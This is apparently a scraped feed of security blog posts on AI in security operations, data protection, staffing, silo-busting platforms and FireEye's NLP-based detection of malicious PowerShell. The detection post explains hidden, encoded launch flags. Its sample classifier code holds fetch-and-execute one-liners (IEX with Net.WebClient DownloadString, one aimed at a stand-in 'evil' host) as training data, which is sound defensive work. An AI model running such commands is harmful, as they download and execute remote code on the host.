The post Fight Evolving Cybersecurity Threats With a One-Two-Three Punch appeared first on Security Intelligence.

Manipulating Digital Mammograms Via Artificial Intelligence May Cause Misdiagnosis

Mammography has been a critical procedure for diagnosing breast cancer. Yet, at the same time, the exposure to radiation has …

Manipulating Digital Mammograms Via Artificial Intelligence May Cause Misdiagnosis on Latest Hacking News.

AI in cyber security: a help or a hindrance?

AI has the possibility of being deployed by both sides: those looking to attack and those looking to defend. With a disappearing IT perimeter, a widening skills gap and the increasing sophistication …

The post AI in cyber security: a help or a hindrance? appeared first on The Cyber Security Place.

Is Your SOC Overwhelmed? Artificial Intelligence and MITRE ATT&CK Can Help Lighten the Load

Whether you have a security team of two or 100, your goal is to ensure that the business thrives. That means protecting critical systems, users and data, detecting and responding to threats, and staying one step ahead of cybercrime.

However, security teams today are faced with myriad challenges, such as fragmented threat data, an overabundance of poorly integrated point solutions and lengthy dwell times — not to mention an overwhelming volume of threat intelligence and a dearth of qualified talent to analyze it.

With the average cost of a data breach as high as $3.86 million, up 6.4 percent from 2017, security leaders need solutions and strategies that deliver demonstrable value to their business. But without a comprehensive framework by which to implement these technologies, even the most advanced tools will have little effect on the organization’s overall security posture. How can security teams lighten the load on their analysts while maximizing the value of their technology investments?

Introducing the MITRE ATT&CK Framework

The MITRE Corporation maintains several common cybersecurity industry standards, including Common Vulnerabilities and Exposures (CVE) and Common Weakness Enumeration (CWE). MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.

A cyber kill chain describes the various stages of a cyberattack as it pertains to network security. The original framework, called the Cyber Kill Chain, was developed by Lockheed Martin to help organizations identify and prevent cyber intrusions.

The steps in a kill chain trace the typical stages of an attack from early reconnaissance to completion. Analysts use the chain to detect and prevent advanced persistent threats (APT).

Cyber Kill Chain

The MITRE ATT&CK framework builds on the Cyber Kill Chain, provides a deeper level of granularity and is behavior-centric.

MITRE Modified Cyber Kill Chain

Benefits of adopting the MITRE ATT&CK framework in your security operations center (SOC) include:

  • Helping security analysts understand adversary behavior by identifying tactics and techniques;

  • Guiding threat hunting and helping prioritize investigations based on tactics used;

  • Helping determine the coverage and detection capability (or lack thereof); and

  • Determining the overall impact using adversaries’ behaviors.

How Artificial Intelligence Brings the ATT&CK Framework to Life

To unlock the full range of benefits, organizations should adopt artificial intelligence (AI) solutions alongside the ATT&CK framework. This confluence enables security leaders to automate incident analysis, thereby force-multiplying the team’s efforts and enabling analysts to focus on the most important tasks in an investigation.

Artificial intelligence solutions can also help security teams drive more consistent and deeper investigations. Whether it’s 4:30 p.m. on a Friday or 10 a.m. on a Monday, your investigations should be equally thorough each and every time.

Finally, using advanced AI tools, such as the newly released QRadar Advisor with Watson 2.0, in the context of the ATT&CK framework can help organizations reduce dwell times with a quicker and more decisive escalation process. Security teams can determine root cause analysis and drive next steps with confidence by mapping the attack to their dynamic playbook.

Learn how QRadar Advisor with Watson 2.0 embraces the MITRE ATT&CK framework

The post Is Your SOC Overwhelmed? Artificial Intelligence and MITRE ATT&CK Can Help Lighten the Load appeared first on Security Intelligence.

CIPL Publishes Report on Artificial Intelligence and Data Protection in Tension

The Centre for Information Policy Leadership (“CIPL”) at Hunton Andrews Kurth LLP recently published the first report in its project on Artificial Intelligence (“AI”) and Data Protection: Delivering Sustainable AI Accountability in Practice.

The report, entitled “Artificial Intelligence and Data Protection in Tension,” aims to describe in clear, understandable terms:

  • what AI is and how it is being used all around us today;
  • the role that personal data plays in the development, deployment and oversight of AI; and
  • the opportunities and challenges presented by AI to data protection laws and norms.

The report describes AI capabilities and examples of public and private uses of AI applications in society. It also looks closely at various tensions that exist between well-established data protection principles and the requirements of AI technologies.

The report concludes with six general observations:

  • Not all AI is the same;
  • AI is widely used in society today and is of significant economic and societal value;
  • AI requires substantial amounts of data to perform optimally;
  • AI requires data to identify and guard against bias;
  • The role of human oversight of AI is likely to and will need to change for AI to deliver the greatest benefit to humankind; and
  • AI challenges some requirements of data protection law.

The report is a level-setting backdrop for the next phase of CIPL’s AI project – working with data protection officials, industry leaders and others to identify practical ways of addressing challenges and harnessing the opportunities presented by AI and data protection.

After this next phase, CIPL expects to release a second report, Delivering Sustainable AI Accountability in Practice, which will address some of the critical tools that companies and organizations are starting to develop and implement to promote accountability for their use of AI within existing legal and ethical frameworks, as well as reasonable interpretations of existing principles and laws that regulators can employ to achieve efficient, effective privacy protection in the AI context. The report will also touch on considerations for developing data protection laws that are cognizant of AI and other innovative technologies.

To read the first report in detail and to learn more about the observations detailed above, please see the full report.

Center for Connected Medicine Polls Top Health Systems About 2019 Priorities

Cybersecurity is still the big one. But interoperability and telehealth are not far behind for leading organizations’ technology goals. The Center for Connected Medicine polled IT executives across 38 health systems …

The post Center for Connected Medicine Polls Top Health Systems About 2019 Priorities appeared first on The Cyber Security Place.

Soft Skills, Solid Benefits: Cybersecurity Staffing Shifts Gears to Bring in New Skill Sets

With millions of unfilled cybersecurity jobs and security experts in high demand, chief information security officers (CISOs) are starting to think outside the box to bridge the skills gap. Already, initiatives such as outsourced support and systems automation are making inroads to reduce IT stress and improve efficiency — but they’re not enough to drive long-term success.

Enter the next frontier for forward-thinking technology executives: Soft skills.

How Important Are Soft Skills in the Enterprise?

Soft skills stem from personality traits and characteristics. Common examples include excellent communication, above-average empathy and the ability to demystify tech jargon, as opposed to the certifications and degrees associated with traditional IT skills.

Historically, IT organizations have prioritized harder skills over their softer counterparts — what good is empathy in solving storage problems or improving server uptime? However, as noted by Forbes, recent Google data revealed measurable benefits when teams contain a mix of hard and soft skills. The search giant found that the “highest-performing teams were interdisciplinary groups that benefited heavily from employees who brought strong soft skills to the collaborative process.”

How Can Companies Quantify Qualitative Skill Sets?

Soft skills drive value, but how can organizations quantify qualitative characteristics? Which skill sets offer the greatest value for corporate objectives?

When it comes to prioritization, your mileage may vary; depending on the nature and complexity of IT projects, different skills provide different value. For example, long-term projects that require cross-departmental collaboration could benefit from highly communicative IT experts, while quick-turnaround mobile application developments may require creative thinking to identify potential security weaknesses.

According to Tripwire, there is some industry consensus on the most sought-after skills: Analytical thinking tops the list at 65 percent, followed by good communication (60 percent), troubleshooting (59 percent) and strong ethical behavior (58 percent). CIO calls out skills such as in-house customer service, a collaborative mindset and emotional intelligence.

Start Your Search for Soft Cybersecurity Skills

The rise of soft skills isn’t happening in a vacuum. As noted by a recent Capgemini study, “The talent gap in soft digital skills is more pronounced than in hard digital skills,” with 51 percent of companies citing a lack of hard digital skills and 59 percent pointing to a need for softer skill sets. CISOs must strive to create hiring practices that seek out soft-skilled applicants and a corporate culture that makes the best use of these skills.

When it comes to hiring, start by identifying a shortlist of skills that would benefit IT projects — these might include above-average communication, emotional aptitude or adaptability — then recruit with these skills in mind. This might mean tapping new collar candidates who lack formal certifications but have the drive and determination to work in cybersecurity. It also means designing an interview process that focuses on staff interaction and the ability of prospective employees to recognize and manage interpersonal conflict.

It’s also critical to create a plan for long-term retention. Enterprises must create IT environments that maximize employee autonomy and give staff the ability to implement real change. Just like hard skills, if soft skills aren’t used regularly they can decay over time — and employees won’t wait around if companies aren’t willing to change.

Cultivate Relationships Between Humans and Hardware

Just as IT certifications are adapting to meet the demands of new software, hardware and infrastructure, soft skills are also changing as technology evolves. Consider the rise of artificial intelligence (AI): Often portrayed positively as a key component of automated processes and negatively as an IT job stealer, there’s an emerging need for IT skills that streamline AI interaction and fill in critical performance gaps.

As noted by HR Technologist, tasks that require emotional intelligence are naturally resistant to AI. These include everything from delivering boardroom presentations to analyzing qualitative user feedback or assisting staff with cybersecurity concerns. Here, the human nature of soft skills provides their core value: Over time, these skills will set employees apart from their peers and organizations apart from the competition. Enterprises must also court professionals capable of communicating with AI tools and human colleagues with equal facility. These soft-centric characteristics position new collar employees as the bridge between new technologies and existing stakeholder expectations.

It’s Time to Prioritize Softer Skill Sets

There’s obviously solid value in soft skills — according to a study from the University of Michigan, these skills offer a 256 percent return on investment (ROI). For CISOs, the message is clear: It’s time to prioritize softer skill sets, re-evaluate hiring and recruitment practices, and prepare for a future where the hard skills of AI-enhanced technology require a soft balance to drive cybersecurity success.

The post Soft Skills, Solid Benefits: Cybersecurity Staffing Shifts Gears to Bring in New Skill Sets appeared first on Security Intelligence.

How to Choose the Right Artificial Intelligence Solution for Your Security Problems

Artificial intelligence (AI) brings a powerful new set of tools to the fight against threat actors, but choosing the right combination of libraries, test suites and training models when building AI security systems is highly dependent on the situation. If you’re thinking about adopting AI in your security operations center (SOC), the following questions and considerations can help guide your decision-making.

What Problem Are You Trying to Solve?

Spam detection, intrusion detection, malware detection and natural language-based threat hunting are all very different problem sets that require different AI tools. Begin by considering what kind of AI security systems you need.

Understanding the outputs you expect helps you frame the problem and test your data. Ask yourself whether you’re solving a classification or regression problem, building a recommendation engine or detecting anomalies. Depending on the answers to those questions, you can apply one of four basic types of machine learning:

  1. Supervised learning trains an algorithm based on example sets of input/output pairs. The goal is to develop new inferences based on patterns inferred from the sample results. Sample data must be available and labeled. For example, designing a spam detection model by learning from samples labeled spam/nonspam is a good application of supervised learning.
  2. Unsupervised learning uses data that has not been labeled, classified or categorized. The machine is challenged to identify patterns through processes such as cluster analysis, and the outcome is usually unknown. Unsupervised machine learning is good at discovering underlying patterns and data, but is a poor choice for a regression or classification problem. Network anomaly detection is a security problem that fits well in this category.
  3. Semisupervised learning uses a combination of labeled and unlabeled data, typically with the majority being unlabeled. It is primarily used to improve the quality of training sets. For exploit kit identification problems, we can find some known exploit kits to train our model, but there are many variants and unknown kits that can’t be labeled. We can use semisupervised learning to address the problem.
  4. Reinforcement learning seeks the optimal path to a desired result by continually rewarding improvement. The problem set is generally small, and the training data well-understood. An example of reinforcement learning is a generative adversarial network (GAN), such as this experiment from Cornell University in which distance, measured in the form of correct and incorrect bits, is used as a loss function to encrypt messages between two neural networks and avoid eavesdropping by an unauthorized third neural network.

Artificial Intelligence Depends on Good Data

Machine learning is predicated on learning from data, so having the right quantity and quality is essential. Security leaders should ask the following questions about their data sources to optimize their machine learning deployments (a short audit sketch follows the list):

  • Is there enough data? You’ll need a sufficient amount to represent all possible scenarios that a system will encounter.
  • Does the data contain patterns that machine learning systems can learn from? Good data sets should have frequently recurring values, clear and obvious meanings, few out-of-range values and persistence, meaning that they change little over time.
  • Is the data sparse? Are certain expected values missing? This can create misleading results.
  • Is the data categorical or numeric in nature? This dictates the choice of the classifier we can use.
  • Are labels available?
  • Is the data current? This is particularly important in AI security systems because threats change so quickly. For example, a malware detection system that has been trained on old samples will have difficulty detecting new malware variations.
  • Is the source of the data trusted? You don’t want to train your model from publicly available data of origins you don’t trust. Data sample poisoning is just one attack vector through which machine learning-based security models are compromised.
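
A few of these checks lend themselves to a quick, scriptable audit. The pandas sketch below (with an invented miniature dataset) covers sparsity, label availability and data types:

    # A miniature data audit covering a few of the checklist questions.
    import pandas as pd

    df = pd.DataFrame({
        "bytes_out": [512, 1024, None, 2048, 512],          # numeric feature
        "proto":     ["tcp", "tcp", "udp", None, "tcp"],    # categorical feature
        "label":     ["normal", "normal", "attack", "normal", "normal"],
    })

    print(df.isna().mean())                          # sparsity per column
    print(df["label"].value_counts(normalize=True))  # labels present? balanced?
    print(df.dtypes)                                 # categorical vs. numeric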

Choosing the Right Platforms and Tools

There is a wide variety of platforms and tools available on the market, but how do you know which is the right one for you? Ask the following questions to help inform your choice:

  • How comfortable are you in a given language?
  • Does the tool integrate well with your existing environment?
  • Is the tool well-suited for big data analytics?
  • Does it provide built-in data parsing capabilities that enable the model to understand the structure of data?
  • Does it use a graphical or command-line interface?
  • Is it a complete machine learning platform or just a set of libraries that you can use to build models? The latter provides more flexibility, but also has a steeper learning curve.

What About the Algorithm?

You’ll also need to select an algorithm to employ. Try a few different algorithms and compare to determine which delivers the most accurate results. Here are some factors that can help you decide which algorithm to start with:

  • How much data do you have, and is it of good quality? Data with many missing values will deliver lower-quality results.
  • Is the learning problem supervised, unsupervised or reinforcement learning? You’ll want to match the data set to the use case as described above.
  • What type of problem are you solving: classification, regression, anomaly detection or dimensionality reduction? Different algorithms work best for each type of problem.
  • How important is accuracy versus speed? If approximations are acceptable, you can get by with smaller data sets and lower-quality data. If accuracy is paramount, you’ll need higher quality data and more time to run the machine learning algorithms.
  • How much visibility do you need into the process? Algorithms that provide decision trees show you clearly how the model reached a decision, while neural networks are a bit of a black box.
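
Putting the “try a few algorithms and compare” advice into practice can be a short loop. The sketch below assumes scikit-learn, with synthetic data standing in for a prepared feature matrix and labels.

```python
# Compare candidate algorithms on the same data and report mean accuracy.
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
from sklearn.neural_network import MLPClassifier
from sklearn.tree import DecisionTreeClassifier

X, y = make_classification(n_samples=500, n_features=20, random_state=0)

candidates = {
    "decision tree (transparent)": DecisionTreeClassifier(random_state=0),
    "logistic regression": LogisticRegression(max_iter=1000),
    "neural network (black box)": MLPClassifier(max_iter=2000, random_state=0),
}
for name, clf in candidates.items():
    scores = cross_val_score(clf, X, y, cv=5)  # 5-fold cross-validation
    print(f"{name}: mean accuracy {scores.mean():.3f}")
```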

How to Train, Test and Evaluate AI Security Systems

Training samples should be constantly updated as new exploits are discovered, so it’s often necessary to perform training on the fly. However, training in real time opens up the risk of adversarial machine learning attacks in which bad actors attempt to disrupt the results by introducing misleading input data.

While it is often impossible to perform training offline, it is desirable to do so when possible so the quality of the data can be regulated. Once the training process is complete, the model can be deployed into production.

One common method of testing trained models is to split the data set and devote a portion of the data — say, 70 percent — to training and the rest to testing. If the model is robust, the output from both data sets should be similar.
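
In scikit-learn terms (an assumption for illustration), the 70/30 split looks like this:

```python
# Hold out 30 percent of the data for testing; similar train and test
# scores suggest a robust model. Synthetic data is a placeholder.
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

X, y = make_classification(n_samples=1000, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(
    X, y, train_size=0.70, random_state=0)

model = RandomForestClassifier(random_state=0).fit(X_train, y_train)
print("train accuracy:", model.score(X_train, y_train))
print("test accuracy:", model.score(X_test, y_test))
```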

A somewhat more refined approach called cross-validation divides the data set into groups of equal size and trains on all but one of the groups. For example, if the number of groups is “n,” then you would train on n-1 groups and test with the one set that is left out. This process is repeated n times, leaving out a different group for testing each time, and performance is measured by averaging results across all repetitions.
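
The same idea expressed as k-fold cross-validation, again sketched with scikit-learn on placeholder data:

```python
# Split into n equal groups, train on n-1, test on the held-out group,
# and average performance across all n repetitions (here n = 5).
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import KFold, cross_val_score

X, y = make_classification(n_samples=1000, random_state=0)
cv = KFold(n_splits=5, shuffle=True, random_state=0)
scores = cross_val_score(RandomForestClassifier(random_state=0), X, y, cv=cv)
print("per-fold accuracy:", scores)
print("mean accuracy:", scores.mean())
```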

Choice of evaluation metrics also depends on the type of problem you’re trying to solve. For example, a regression problem measures the error between the actual value and the predicted value, so the metrics you might use include mean absolute error, root mean squared error, relative absolute error and relative squared error.

For a classification problem, the objective is to determine which categories new observations belong in — which requires a different set of quality metrics, such as accuracy, precision, recall, F1 score and area under the curve (AUC).
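
Both families of metrics are one call away in common libraries; here is a sketch with scikit-learn and made-up predictions:

```python
# Classification metrics on toy predictions; y_true/y_pred/y_score would
# come from your own model in practice.
from sklearn.metrics import (accuracy_score, f1_score, mean_absolute_error,
                             precision_score, recall_score, roc_auc_score)

y_true = [0, 0, 1, 1, 1, 0]               # actual classes
y_pred = [0, 1, 1, 1, 0, 0]               # predicted classes
y_score = [0.1, 0.6, 0.9, 0.8, 0.4, 0.2]  # predicted probabilities, for AUC

print("accuracy :", accuracy_score(y_true, y_pred))
print("precision:", precision_score(y_true, y_pred))
print("recall   :", recall_score(y_true, y_pred))
print("F1 score :", f1_score(y_true, y_pred))
print("AUC      :", roc_auc_score(y_true, y_score))

# Regression problems use error metrics instead, e.g. mean absolute error:
print("MAE:", mean_absolute_error([1.0, 2.0, 3.0], [1.1, 1.9, 3.4]))
```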

Deployment on the Cloud or On-Premises?

Lastly, you’ll need to select a location for deployment. Cloud machine learning platforms certainly have advantages, such as speed of provisioning, choice of tools and the availability of third-party training data. However, you may not want to share data in the cloud for security and compliance reasons. Consider these factors before choosing whether to deploy on-premises or in a public cloud.

These are just a few of the many factors to consider when building security systems with artificial intelligence. Remember, the best solution for one organization or security problem is not necessarily the best solution for everyone or every situation.

The post How to Choose the Right Artificial Intelligence Solution for Your Security Problems appeared first on Security Intelligence.

Despite rise in security awareness, employees’ poor security habits are getting worse

Despite an increased focus on cybersecurity awareness in the workplace, employees’ poor cybersecurity habits are getting worse, compounded by the speed and complexity of the digital transformation. Of the 1,600 global employees Vanson

The post Despite rise in security awareness, employees’ poor security habits are getting worse appeared first on The Cyber Security Place.

Busting Cybersecurity Silos

Cybersecurity is among the most siloed disciplines in all of IT. The industry is exceedingly fragmented between many highly specialized companies. In fact, according to IBM estimates, the average enterprise uses 80 different products from 40 vendors. To put this in perspective, imagine a law enforcement officer trying to piece together the events surrounding a crime based solely on witness statements written in multiple languages — one in Chinese, another in Arabic, a third in Italian, etc. Security operations centers (SOCs) face a similar challenge all the time.

Security professionals are increasingly taking on the role of investigator, sorting through multiple data sources to track down slippery foes. Third-party integration tools don’t exist, so the customer is responsible for bringing together data from multiple sources and applying insights across an increasingly complex environment.

For example, a security team may need to coordinate access records with Lightweight Directory Access Protocol (LDAP) profiles, database access logs and network activity monitoring data to determine whether a suspicious behavior is legitimate or the work of an impostor. Security information may even need to be brought in from external sources such as social networks to validate an identity. The process is equivalent to performing a massive database join, but with incompatible data spread across a global network.

What Can We Learn About Collaboration From Threat Actors?

Organizations would be wise to observe the strategy of today’s threat actors, who freely share tactics, tools and vulnerabilities on the dark web, accelerating both the speed and impact of their attacks. As defenders of cybersecurity, we need to take a similar approach to sharing security information and building collaborative solutions that will address the evolving cybersecurity threat landscape.

This is easier said than done, as the cybersecurity industry has not been successful in enabling information to be shared, federated and contextualized in a way that drives effective security outcomes. But the barriers aren’t solely technical; corporate policies, customer privacy concerns and regulations all combine to inhibit information sharing. We must enable collaboration in ways that don’t undermine the interests of the collaborators.

Security information sharing is not only useful for threat management, but also for accurately determining IT risk, enabling secure business transformation, accelerating innovation, helping with continuous compliance and minimizing friction for end users. For example, organizations can leverage the identity context of an individual from multiple sources to evaluate the person’s reputation and minimize fraud for both new account creation and continuous transaction validation. This type of risk-based approach allows organizations to quickly support new initiatives, such as open banking application programming interfaces (APIs), and regulations, such as the European Union’s revised Payment Service Directive (PSD2).

The Keys to Building a Community Across Cybersecurity Silos

Sharing security data and insights and developing an ecosystem across cybersecurity silos is a transformational concept for the industry — one that requires people, process and technology adaptations. As organizations embrace secure digital transformations, security professionals need to adopt a risk-based approach to security management built on insights from several sources that include both technical and business contexts.

As security becomes more distributed within an organization, processes need to evolve to support integrated and collaborative operations. Sharing of data and insights will enable multiple business units to coordinate and deliver unified security. Technology needs to be API-driven and delivered as a service so it can integrate with others to facilitate sharing. Security solutions also need to evolve to deliver outcome-based security through capabilities that take advantage of data and insights from multiple vendors, platforms and locations.

The security industry is taking steps to address the complexity problem with standards designed to efficiently share data and insights. Standards such as STIX/TAXII, OpenC2 and CACAO are rapidly maturing and gaining adoption for their ability to enable vendors and their customers to choose what data to share. More than 50 cybersecurity vendors have adopted or plan to adopt STIX as a standard for data interchange, according to OASIS.
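
As a taste of what sharing structured threat data looks like, the sketch below builds a minimal STIX indicator with the OASIS stix2 Python library; the library choice and the placeholder hash are assumptions for illustration, not a prescribed workflow.

```python
# A minimal STIX indicator ready for exchange over a TAXII feed. Assumes
# the OASIS stix2 library (pip install stix2); the hash is a placeholder.
from stix2 import Indicator

indicator = Indicator(
    name="Suspicious downloader hash",
    description="Placeholder IoC shared between tools and vendors",
    pattern="[file:hashes.'SHA-256' = '0000000000000000000000000000000000000000000000000000000000000000']",
    pattern_type="stix",
)
print(indicator.serialize(pretty=True))
```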

However, more work needs to be done. Standards and practices need to evolve to enable information sharing within and between industries, as well as ways to exchange methodologies, indicators of compromise (IoCs), response strategies and the like.

Finally, we need a cloud-based community platform that supports open standards-based collaboration for the delivery of integrated cybersecurity solutions. A platform-based approach will bring together people, process, tools, data and insights without expensive customization and integration projects. By increasing the adoption of such a platform, we can create a cybersecurity ecosystem that can address complexity, combat the evolving threat landscape and reduce the need for specialized security skills.

Bringing the Industry Together With IBM Security Connect

IBM has been on a journey to reduce complexity through a security immune system approach, enabling open collaboration through initiatives such as X-Force Exchange and Quad9, and driving open industry standards such as STIX/TAXII. We are furthering our commitment to strengthening cybersecurity with the recent announcement of IBM Security Connect, an open cloud platform for developing solutions based on distributed capabilities and federated data and insights.

Security Connect provides an open data integration service for sharing and normalizing threat intelligence, federated data searching across on-premises and cloud data repositories, and real-time sharing of security alerts, events and insights that can be leveraged by any integrated application or solution. This will pave the way for new methods of delivering innovative outcome-based security solutions powered by artificial intelligence (AI).

Clients and partners can take advantage of this open, cloud-native platform by combining their own data and insights with capabilities from IBM and other vendor technologies. We have already partnered with 15 major security software providers and look forward to adding more.

We are very excited about bringing this concept of data and insights collaboration to life, and grateful for the opportunity to bring cybersecurity silos together to reduce complexity and keep up with the evolving cybersecurity landscape. Early feedback has been gratifying, and we’d love to hear your comments and suggestions. I hope you will join us in this endeavor by learning more about IBM Security Connect and participating in the early field trial.

The post Busting Cybersecurity Silos appeared first on Security Intelligence.

Malicious PowerShell Detection via Machine Learning

Introduction

Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.

In this post you will learn:

  • Why malicious PowerShell can be challenging to detect with a traditional “signature-based” or “rule-based” detection engine.
  • How Natural Language Processing (NLP) can be applied to tackle this challenge.
  • How our NLP model detects malicious PowerShell commands, even if obfuscated.
  • The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.

Background

PowerShell is one of the most popular tools used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).


Figure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 – blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series

FireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the tactics, techniques and procedures (TTPs) used in PowerShell attacks, as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to improve PowerShell logging, which gives greater visibility into potential attacker activity. More recently, our in-depth report on APT32 highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.


Figure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain

Let’s take a deep dive into an example of a malicious PowerShell command (Figure 3).


Figure 3: Example of a malicious PowerShell command

The following is a quick explanation of the arguments:

  • -NoProfile – indicates that the current user’s profile setup script should not be executed when the PowerShell engine starts.
  • -NonI – shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.
  • -W Hidden – shorthand for “-WindowStyle Hidden”, which indicates that the PowerShell session window should be started in a hidden manner.
  • -Exec Bypass – shorthand for “-ExecutionPolicy Bypass”, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn’t meant to be a security boundary.
  • -encodedcommand – indicates the following chunk of text is a base64 encoded command.
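
Recovering such a payload offline is mechanical, since -EncodedCommand carries Base64 over UTF-16LE text. Here is a small Python sketch with a harmless placeholder command:

```python
# Round-trip a (harmless) PowerShell command the way -EncodedCommand
# expects it: UTF-16LE text wrapped in Base64.
import base64

encoded = base64.b64encode("Write-Output 'hello'".encode("utf-16-le")).decode()
print(encoded)                                        # what the flag receives
print(base64.b64decode(encoded).decode("utf-16-le"))  # Write-Output 'hello'
```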

What is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.


Figure 4: The decoded command for the aforementioned example

Interestingly, the decoded command unveils stealthy fileless network access and remote content execution!

  • IEX is an alias for the Invoke-Expression cmdlet that will execute the command provided on the local machine.
  • The new-object cmdlet creates an instance of a .NET Framework or COM object, here a net.webclient object.
  • The downloadstring method will download the contents from <url> into a memory buffer (which IEX will in turn execute).

It’s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting CVE-2017-10271 to deliver a cryptocurrency miner. This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.

There are several reasons why adversaries prefer PowerShell:

  1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.
  2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.
  3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.

Additionally, from an economics perspective:

  • Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with open source obfuscation tools.
  • Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.

Next, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.

Natural Language Processing for Detecting Malicious PowerShell

Can we use machine learning to predict if a PowerShell command is malicious?

One advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.

After we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.

One of the technical challenges we tackled was synonymy, a problem studied in linguistics. For instance, “NOL”, “NOLO”, and “NOLOGO” have identical semantics in PowerShell syntax. In NLP, a stemming algorithm reduces a word to its root form, such as “Innovating” being stemmed to “Innovate”.

We created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as a trie, as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.


Figure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)
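
As an illustration of the idea (not FireEye’s code), a minimal trie stemmer can resolve unambiguous parameter prefixes to a canonical token; the three-parameter vocabulary below is a placeholder.

```python
# Minimal trie-based stemmer in the spirit of Figure 5. PowerShell accepts
# any unambiguous prefix of a parameter, so "NOL", "NOLO", and "NOLOGO"
# all mean -NoLogo; the trie maps each such prefix to a canonical token.

class TrieStemmer:
    def __init__(self):
        self.root = {}

    def insert(self, canonical: str) -> None:
        """Register a canonical token; prefixes along its path can stem to it."""
        node = self.root
        for ch in canonical.lower():
            node = node.setdefault(ch, {})
        node["$"] = canonical  # terminal marker stores the canonical form

    def stem(self, token: str) -> str:
        """Return the canonical token if this is an unambiguous prefix."""
        node = self.root
        for ch in token.lower():
            if ch not in node:
                return token  # unknown token: leave unchanged
            node = node[ch]
        while "$" not in node:       # follow the path while it is unambiguous
            if len(node) != 1:
                return token         # ambiguous prefix: leave unchanged
            node = next(iter(node.values()))
        return node["$"]

stemmer = TrieStemmer()
for param in ("NoLogo", "NoProfile", "NonInteractive"):
    stemmer.insert(param)

print(stemmer.stem("NOL"))   # -> NoLogo
print(stemmer.stem("NOLO"))  # -> NoLogo
print(stemmer.stem("No"))    # -> No (ambiguous across all three parameters)
```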

The overall NLP pipeline we developed is captured in the following table:

| NLP Key Module | Functionality |
| --- | --- |
| Decoder | Detect and decode any encoded text |
| Named Entity Recognition (NER) | Detect and recognize any entities such as IP, URL, email, registry key, etc. |
| Tokenizer | Tokenize the PowerShell command into a list of tokens |
| Stemmer | Stem tokens into semantically identical tokens, using the trie |
| Vocabulary Vectorizer | Vectorize the list of tokens into a machine learning-friendly format |
| Supervised Classifier | Binary classification algorithms: Kernel Support Vector Machine, Gradient Boosted Trees, Deep Neural Networks |
| Reasoning | The explanation of why the prediction was made; enables analysts to validate predictions |

The following are the key steps when streaming the aforementioned example through the NLP pipeline:

  • Detect and decode the Base64 commands, if any
  • Recognize entities using Named Entity Recognition (NER), such as the <URL>
  • Tokenize the entire text, including both clear text and obfuscated commands
  • Stem each token, and vectorize them based on the vocabulary
  • Predict the malicious probability using the supervised learning model


Figure 6: NLP pipeline that predicts the malicious probability of a PowerShell command
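
A drastically simplified rendition of these steps is sketched below with scikit-learn; the toy corpus, regex-based decoder and model choice are illustrative assumptions, not FireEye’s implementation.

```python
# Toy PowerShell command classifier: decode, tokenize/vectorize, then
# train a gradient boosted tree model. Commands and labels are placeholders.
import base64
import re
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.pipeline import make_pipeline

def normalize(cmd: str) -> str:
    """Decoder step (simplified): expand -EncodedCommand payloads, lowercase."""
    match = re.search(r"-encodedcommand\s+(\S+)", cmd, re.IGNORECASE)
    if match:
        try:
            cmd += " " + base64.b64decode(match.group(1)).decode("utf-16-le", "ignore")
        except ValueError:
            pass  # not valid Base64; keep the raw token
    return cmd.lower()

commands = [
    "Get-ChildItem C:\\Users",                                           # benign
    "Get-Process | Sort-Object CPU",                                     # benign
    "IEX (New-Object Net.WebClient).DownloadString('http://x/payload')", # malicious
    "powershell -NoP -NonI -W Hidden -Exec Bypass -encodedcommand aQBlAHgA",  # malicious
]
labels = [0, 0, 1, 1]  # 0 = benign, 1 = malicious

model = make_pipeline(CountVectorizer(preprocessor=normalize),
                      GradientBoostingClassifier(random_state=0))
model.fit(commands, labels)

test = "iex (new-object net.webclient).downloadstring('http://evil/a')"
print("malicious probability:", model.predict_proba([test])[0][1])
```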

